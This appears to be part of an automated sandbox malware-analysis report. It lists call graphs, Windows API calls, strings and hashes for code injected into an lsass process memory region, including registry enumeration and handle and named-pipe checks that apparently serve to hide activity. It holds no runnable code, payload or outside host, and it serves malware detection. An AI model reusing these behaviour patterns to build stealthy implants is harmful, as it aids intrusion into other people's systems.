HeapAlloc 14883->14924 14885 202c0ae1673 14886 202c0ae168e RegOpenKeyExW 14885->14886 14887 202c0ae16c0 RegOpenKeyExW 14886->14887 14888 202c0ae18a6 14886->14888 14889 202c0ae16ff RegOpenKeyExW 14887->14889 14890 202c0ae16e9 14887->14890 14888->14875 14892 202c0ae173a RegOpenKeyExW 14889->14892 14893 202c0ae1723 14889->14893 14925 202c0ae12bc RegQueryInfoKeyW 14890->14925 14894 202c0ae175e 14892->14894 14895 202c0ae1775 RegOpenKeyExW 14892->14895 14934 202c0ae104c RegQueryInfoKeyW 14893->14934 14899 202c0ae12bc 16 API calls 14894->14899 14900 202c0ae17b0 RegOpenKeyExW 14895->14900 14901 202c0ae1799 14895->14901 14902 202c0ae176b RegCloseKey 14899->14902 14904 202c0ae17eb RegOpenKeyExW 14900->14904 14905 202c0ae17d4 14900->14905 14903 202c0ae12bc 16 API calls 14901->14903 14902->14895 14906 202c0ae17a6 RegCloseKey 14903->14906 14908 202c0ae180f 14904->14908 14909 202c0ae1826 RegOpenKeyExW 14904->14909 14907 202c0ae12bc 16 API calls 14905->14907 14906->14900 14912 202c0ae17e1 RegCloseKey 14907->14912 14913 202c0ae104c 6 API calls 14908->14913 14910 202c0ae1861 RegOpenKeyExW 14909->14910 14911 202c0ae184a 14909->14911 14916 202c0ae189c RegCloseKey 14910->14916 14917 202c0ae1885 14910->14917 14915 202c0ae104c 6 API calls 14911->14915 14912->14904 14914 202c0ae181c RegCloseKey 14913->14914 14914->14909 14918 202c0ae1857 RegCloseKey 14915->14918 14916->14888 14919 202c0ae104c 6 API calls 14917->14919 14918->14910 14920 202c0ae1892 RegCloseKey 14919->14920 14920->14916 14921->14879 14922->14881 14923->14883 14924->14885 14926 202c0ae148a RegCloseKey 14925->14926 14927 202c0ae1327 GetProcessHeap HeapAlloc 14925->14927 14926->14889 14928 202c0ae1476 GetProcessHeap HeapFree 14927->14928 14929 202c0ae1352 RegEnumValueW 14927->14929 14928->14926 14930 202c0ae13a5 14929->14930 14930->14928 14930->14929 14931 202c0ae152c 2 API calls 14930->14931 14932 202c0ae141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14930->14932 14933 202c0ae13d3 GetProcessHeap HeapAlloc GetProcessHeap 
HeapFree 14930->14933 14931->14930 14932->14930 14933->14932 14935 202c0ae10bf 14934->14935 14936 202c0ae11b5 RegCloseKey 14934->14936 14935->14936 14937 202c0ae10cf RegEnumValueW 14935->14937 14938 202c0ae114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14935->14938 14936->14892 14937->14935 14938->14935 14939 202c0ae253c 14941 202c0ae25bb 14939->14941 14940 202c0ae27aa 14941->14940 14942 202c0ae261d GetFileType 14941->14942 14943 202c0ae2641 14942->14943 14944 202c0ae262b StrCpyW 14942->14944 14955 202c0ae1a40 GetFinalPathNameByHandleW 14943->14955 14945 202c0ae2650 14944->14945 14949 202c0ae265a 14945->14949 14953 202c0ae26ff 14945->14953 14948 202c0ae3844 StrCmpNIW 14948->14953 14949->14940 14960 202c0ae3844 14949->14960 14963 202c0ae3044 StrCmpIW 14949->14963 14967 202c0ae1cac 14949->14967 14952 202c0ae3044 4 API calls 14952->14953 14953->14940 14953->14948 14953->14952 14954 202c0ae1cac 2 API calls 14953->14954 14954->14953 14956 202c0ae1a6a StrCmpNIW 14955->14956 14957 202c0ae1aa9 14955->14957 14956->14957 14958 202c0ae1a84 lstrlenW 14956->14958 14957->14945 14958->14957 14959 202c0ae1a96 StrCpyW 14958->14959 14959->14957 14961 202c0ae3851 StrCmpNIW 14960->14961 14962 202c0ae3866 14960->14962 14961->14962 14962->14949 14964 202c0ae308d PathCombineW 14963->14964 14965 202c0ae3076 StrCpyW StrCatW 14963->14965 14966 202c0ae3096 14964->14966 14965->14966 14966->14949 14968 202c0ae1ccc 14967->14968 14969 202c0ae1cc3 14967->14969 14968->14949 14970 202c0ae152c 2 API calls 14969->14970 14970->14968 14971 202c0aed6cc 14972 202c0aed6dd _invalid_parameter_noinfo 14971->14972 14973 202c0aed72e 14972->14973 14974 202c0aed712 HeapAlloc 14972->14974 14977 202c0aed6ac 14973->14977 14974->14972 14976 202c0aed72c 14974->14976 14980 202c0aecfa0 14977->14980 14979 202c0aed6b5 14979->14976 14983 202c0aecfb5 Concurrency::details::SchedulerProxy::DeleteThis 14980->14983 14981 202c0aecfe1 FlsSetValue 14982 202c0aecff3 14981->14982 14986 202c0aecfd1 _invalid_parameter_noinfo 
14981->14986 14996 202c0aed6cc 14982->14996 14983->14981 14983->14986 14986->14979 14987 202c0aed020 FlsSetValue 14990 202c0aed03e 14987->14990 14991 202c0aed02c FlsSetValue 14987->14991 14988 202c0aed010 FlsSetValue 14989 202c0aed019 14988->14989 15002 202c0aed744 14989->15002 15007 202c0aecb94 14990->15007 14991->14989 14995 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 14995->14986 14997 202c0aed6dd _invalid_parameter_noinfo 14996->14997 14998 202c0aed72e 14997->14998 14999 202c0aed712 HeapAlloc 14997->14999 15000 202c0aed6ac Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14998->15000 14999->14997 15001 202c0aed002 14999->15001 15000->15001 15001->14987 15001->14988 15003 202c0aed77a 15002->15003 15004 202c0aed749 HeapFree 15002->15004 15003->14986 15004->15003 15005 202c0aed764 Concurrency::details::SchedulerProxy::DeleteThis 15004->15005 15006 202c0aed6ac Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15005->15006 15006->15003 15008 202c0aecc46 _invalid_parameter_noinfo 15007->15008 15011 202c0aecaec 15008->15011 15010 202c0aecc5b 15010->14995 15012 202c0aecb08 15011->15012 15015 202c0aecd7c 15012->15015 15014 202c0aecb1e 15014->15010 15016 202c0aecdc4 Concurrency::details::SchedulerProxy::DeleteThis 15015->15016 15017 202c0aecd98 Concurrency::details::SchedulerProxy::DeleteThis 15015->15017 15016->15014 15017->15016 15019 202c0af07b4 15017->15019 15020 202c0af0850 15019->15020 15024 202c0af07d7 15019->15024 15021 202c0af08a3 15020->15021 15023 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15020->15023 15085 202c0af0954 15021->15085 15026 202c0af0874 15023->15026 15024->15020 15025 202c0af0816 15024->15025 15030 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15024->15030 15028 202c0af0838 15025->15028 15035 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15025->15035 15027 202c0aed744 
Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15026->15027 15031 202c0af0888 15027->15031 15029 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15028->15029 15032 202c0af0844 15029->15032 15033 202c0af080a 15030->15033 15034 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15031->15034 15037 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15032->15037 15045 202c0af2fc8 15033->15045 15040 202c0af0897 15034->15040 15041 202c0af082c 15035->15041 15036 202c0af090e 15037->15020 15038 202c0aed744 6 API calls Concurrency::details::SchedulerProxy::DeleteThis 15043 202c0af08af 15038->15043 15044 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15040->15044 15073 202c0af30d4 15041->15073 15043->15036 15043->15038 15044->15021 15046 202c0af2fd1 15045->15046 15071 202c0af30cc 15045->15071 15047 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15046->15047 15048 202c0af2feb 15046->15048 15047->15048 15050 202c0af2ffd 15048->15050 15051 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15048->15051 15049 202c0af300f 15053 202c0af3021 15049->15053 15054 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15049->15054 15050->15049 15052 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15050->15052 15051->15050 15052->15049 15055 202c0af3033 15053->15055 15056 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15053->15056 15054->15053 15057 202c0af3045 15055->15057 15058 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15055->15058 15056->15055 15059 202c0af3057 15057->15059 15061 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15057->15061 15058->15057 15060 202c0af3069 15059->15060 15062 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15059->15062 15063 202c0af307b 15060->15063 15064 
202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15060->15064 15061->15059 15062->15060 15065 202c0af308d 15063->15065 15066 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15063->15066 15064->15063 15067 202c0af30a2 15065->15067 15068 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15065->15068 15066->15065 15069 202c0af30b7 15067->15069 15070 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15067->15070 15068->15067 15069->15071 15072 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15069->15072 15070->15069 15071->15025 15072->15071 15074 202c0af30d9 15073->15074 15082 202c0af313a 15073->15082 15075 202c0af30f2 15074->15075 15076 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15074->15076 15077 202c0af3104 15075->15077 15078 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15075->15078 15076->15075 15079 202c0af3116 15077->15079 15080 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15077->15080 15078->15077 15081 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15079->15081 15083 202c0af3128 15079->15083 15080->15079 15081->15083 15082->15028 15083->15082 15084 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15083->15084 15084->15082 15086 202c0af0959 15085->15086 15087 202c0af0985 15085->15087 15086->15087 15091 202c0af3174 15086->15091 15087->15043 15090 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15090->15087 15092 202c0af317d 15091->15092 15126 202c0af097d 15091->15126 15127 202c0af3140 15092->15127 15095 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15096 202c0af31a6 15095->15096 15097 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15096->15097 15098 202c0af31b4 15097->15098 15099 202c0af3140 
Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15098->15099 15100 202c0af31c2 15099->15100 15101 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15100->15101 15102 202c0af31d1 15101->15102 15103 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15102->15103 15104 202c0af31dd 15103->15104 15105 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15104->15105 15106 202c0af31e9 15105->15106 15107 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15106->15107 15108 202c0af31f5 15107->15108 15109 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15108->15109 15110 202c0af3203 15109->15110 15111 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15110->15111 15112 202c0af3211 15111->15112 15113 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15112->15113 15114 202c0af321f 15113->15114 15115 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15114->15115 15116 202c0af322d 15115->15116 15117 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15116->15117 15118 202c0af323c 15117->15118 15119 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15118->15119 15120 202c0af3248 15119->15120 15121 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15120->15121 15122 202c0af3254 15121->15122 15123 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15122->15123 15124 202c0af3260 15123->15124 15125 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15124->15125 15125->15126 15126->15090 15128 202c0af3167 15127->15128 15130 202c0af3156 15127->15130 15128->15095 15129 202c0aed744 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15129->15130 15130->15128 15130->15129

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 202c0ae253c-202c0ae25c0 call 202c0b02cc0 8 202c0ae27d8-202c0ae27fb 5->8 9 202c0ae25c6-202c0ae25c9 5->9 9->8 10 202c0ae25cf-202c0ae25dd 9->10 10->8 11 202c0ae25e3-202c0ae2629 call 202c0ae8c60 * 3 GetFileType 10->11 18 202c0ae2641-202c0ae264b call 202c0ae1a40 11->18 19 202c0ae262b-202c0ae263f StrCpyW 11->19 20 202c0ae2650-202c0ae2654 18->20 19->20 22 202c0ae26ff-202c0ae2704 20->22 23 202c0ae265a-202c0ae2673 call 202c0ae30a8 call 202c0ae3844 20->23 24 202c0ae2707-202c0ae270c 22->24 36 202c0ae26aa-202c0ae26f4 call 202c0b02cc0 23->36 37 202c0ae2675-202c0ae26a4 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 23->37 26 202c0ae270e-202c0ae2711 24->26 27 202c0ae2729 24->27 26->27 29 202c0ae2713-202c0ae2716 26->29 31 202c0ae272c-202c0ae2745 call 202c0ae30a8 call 202c0ae3844 27->31 29->27 32 202c0ae2718-202c0ae271b 29->32 48 202c0ae2787-202c0ae2789 31->48 49 202c0ae2747-202c0ae2776 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 31->49 32->27 35 202c0ae271d-202c0ae2720 32->35 35->27 39 202c0ae2722-202c0ae2727 35->39 36->8 46 202c0ae26fa 36->46 37->8 37->36 39->27 39->31 46->23 50 202c0ae27aa-202c0ae27ad 48->50 51 202c0ae278b-202c0ae27a5 48->51 49->48 69 202c0ae2778-202c0ae2783 49->69 55 202c0ae27af-202c0ae27b5 50->55 56 202c0ae27b7-202c0ae27ba 50->56 51->24 55->8 59 202c0ae27bc-202c0ae27bf 56->59 60 202c0ae27d5 56->60 59->60 63 202c0ae27c1-202c0ae27c4 59->63 60->8 63->60 65 202c0ae27c6-202c0ae27c9 63->65 65->60 67 202c0ae27cb-202c0ae27ce 65->67 67->60 68 202c0ae27d0-202c0ae27d3 67->68 68->8 68->60 69->8 70 202c0ae2785 69->70 70->24
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 383afa285ac380fd55eaa2c4cb7d261a7defb1f4293108ecd3c580df2b121f06
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 517190362047C1C6F625DF2998CC3AE7794F389B84F560127DFAA53B8ADA35CA598700

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 72 202c0ae202c-202c0ae2057 call 202c0b02d00 74 202c0ae205d-202c0ae2066 72->74 75 202c0ae206f-202c0ae2072 74->75 76 202c0ae2068-202c0ae206c 74->76 77 202c0ae2078-202c0ae207b 75->77 78 202c0ae2223-202c0ae2243 75->78 76->75 79 202c0ae2081-202c0ae2093 77->79 80 202c0ae2173-202c0ae2176 77->80 79->78 81 202c0ae2099-202c0ae20a5 79->81 82 202c0ae2178-202c0ae2192 call 202c0ae2f04 80->82 83 202c0ae21e7-202c0ae21ea 80->83 84 202c0ae20a7-202c0ae20b7 81->84 85 202c0ae20d3-202c0ae20de call 202c0ae1bbc 81->85 82->78 92 202c0ae2198-202c0ae21ae 82->92 83->78 86 202c0ae21ec-202c0ae21ff call 202c0ae2f04 83->86 84->85 88 202c0ae20b9-202c0ae20d1 StrCmpNIW 84->88 93 202c0ae20ff-202c0ae2111 85->93 98 202c0ae20e0-202c0ae20f8 call 202c0ae1bf4 85->98 86->78 97 202c0ae2201-202c0ae2209 86->97 88->85 88->93 92->78 96 202c0ae21b0-202c0ae21cc 92->96 99 202c0ae2121-202c0ae2123 93->99 100 202c0ae2113-202c0ae2115 93->100 101 202c0ae21d0-202c0ae21e3 96->101 97->78 104 202c0ae220b-202c0ae2213 97->104 98->93 114 202c0ae20fa-202c0ae20fd 98->114 102 202c0ae212a 99->102 103 202c0ae2125-202c0ae2128 99->103 106 202c0ae211c-202c0ae211f 100->106 107 202c0ae2117-202c0ae211a 100->107 101->101 109 202c0ae21e5 101->109 108 202c0ae212d-202c0ae2130 102->108 103->108 110 202c0ae2216-202c0ae2221 104->110 106->108 107->108 112 202c0ae213e-202c0ae2141 108->112 113 202c0ae2132-202c0ae2138 108->113 109->78 110->78 110->110 112->78 115 202c0ae2147-202c0ae214b 112->115 113->81 113->112 114->108 116 202c0ae214d-202c0ae2150 115->116 117 202c0ae2162-202c0ae216e 115->117 116->78 118 202c0ae2156-202c0ae215b 116->118 117->78 118->115 119 202c0ae215d 118->119 119->78
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: S$dialer
                                                        • API String ID: 756756679-3873981283
                                                        • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction ID: 7d0801e181e7e1027f0f2556f8cd6da4d5c454e321737ababf7947f23bb56196
                                                        • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction Fuzzy Hash: 5651AC32B107A4C6FB61CF29E88C6AD63E5F704784F069123DFA512B86DB35C969C300

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: 8c3d5dbfacf504bca622ea7f657326f4a67cd1e3c1ec290e5004b19a988dad2d
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: BCF01922304781D2FB608B21E8CC76D6765F748BC8F958123DB994B966DA2DC68DCB00

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: 14bf7bafefd4b55b8bc325b1bb0149ce76066631eeb9ae1ebb85862f094286e6
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 48E03936601704C6FB048B62D84C34A36E5EB89B06F0681268B0907362DF7E8499C750

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 435a5f88e7c6a6dd218e0f6004eb37f2790bd4aa4d5b291e1e8191fef771e2ad
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: A8119672618782D2F760D721F8CDB6D2294BB54748F528127ABB6497A3EF78C46C8240

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                          • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                        • Sleep.KERNEL32 ref: 00000202C0AE1AD7
                                                        • SleepEx.KERNELBASE ref: 00000202C0AE1ADD
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 1519724245a59a03f973eddcebe70884a6cccd966baeab2eab41fd8751cf1259
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: ED31C071200BE1C1FF509B26DACD3AD53A5AB84FC4F0654239FA987697FE14C879C210

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 202c0ab273c-202c0ab27a4 call 202c0ab29d4 * 4 186 202c0ab27aa-202c0ab27ad 177->186 187 202c0ab29b2 177->187 186->187 188 202c0ab27b3-202c0ab27b6 186->188 189 202c0ab29b4-202c0ab29d0 187->189 188->187 190 202c0ab27bc-202c0ab27bf 188->190 190->187 191 202c0ab27c5-202c0ab27e6 190->191 191->187 193 202c0ab27ec-202c0ab280c 191->193 194 202c0ab280e-202c0ab2836 193->194 195 202c0ab2838-202c0ab283f 193->195 194->194 194->195 196 202c0ab28df-202c0ab28e6 195->196 197 202c0ab2845-202c0ab2852 195->197 198 202c0ab28ec-202c0ab2901 196->198 199 202c0ab2992-202c0ab29b0 196->199 197->196 200 202c0ab2858-202c0ab286a LoadLibraryA 197->200 198->199 201 202c0ab2907 198->201 199->189 202 202c0ab286c-202c0ab2878 200->202 203 202c0ab28ca-202c0ab28d2 200->203 206 202c0ab290d-202c0ab2921 201->206 207 202c0ab28c5-202c0ab28c8 202->207 203->200 204 202c0ab28d4-202c0ab28d9 203->204 204->196 209 202c0ab2923-202c0ab2934 206->209 210 202c0ab2982-202c0ab298c 206->210 207->203 208 202c0ab287a-202c0ab287d 207->208 211 202c0ab287f-202c0ab28a5 208->211 212 202c0ab28a7-202c0ab28b7 208->212 214 202c0ab293f-202c0ab2943 209->214 215 202c0ab2936-202c0ab293d 209->215 210->199 210->206 216 202c0ab28ba-202c0ab28c1 211->216 212->216 218 202c0ab294d-202c0ab2951 214->218 219 202c0ab2945-202c0ab294b 214->219 217 202c0ab2970-202c0ab2980 215->217 216->207 217->209 217->210 220 202c0ab2963-202c0ab2967 218->220 221 202c0ab2953-202c0ab2961 218->221 219->217 220->217 223 202c0ab2969-202c0ab296c 220->223 221->217 223->217
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: e9c472418be9705004432d1361e805bb540b7ad58247b10c253449de9ed0d722
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 8161DF72B01790C7EB648F15908C76DB3A2FB54BA4F598127DF5D0778ADA38D86AC700

                                                        Control-flow Graph
                                                        • Graph image not reproduced in this extraction; entry block 202c0aed6cc, calls HeapAlloc and subroutines 202c0aed6ac, 202c0af0720, 202c0aeb85c
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap
                                                        • String ID:
                                                        • API String ID: 4292702814-0
                                                        • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction ID: f1c622e14429a0b520057bbb946f3f429c66e82a7f768f9b6ab0a37ff79ad3e0
                                                        • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                        • Instruction Fuzzy Hash: E4F0E998311780C1FE546B6699CD39D22845F88BC0F0E5437CF9A867D3EE1CC4AC8620

                                                        Control-flow Graph
                                                        • Graph image not reproduced in this extraction; entry block 202c0ae2b2c, calls GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW and subroutines 202c0b02ce0, 202c0ae199c, 202c0ae1bbc, 202c0ae152c, 202c0ae3844, 202c0ae85c0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 629c2a77cc7c689ebc2a82fae016c29b45818ce3604cad8590d8ad8b42d26791
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 8BB18B62210BA0C6FB688F25C8CC7AD67A5F744B88F565017EF9953796EB35CC68C340
                                                        APIs
                                                        Memory Dump Source
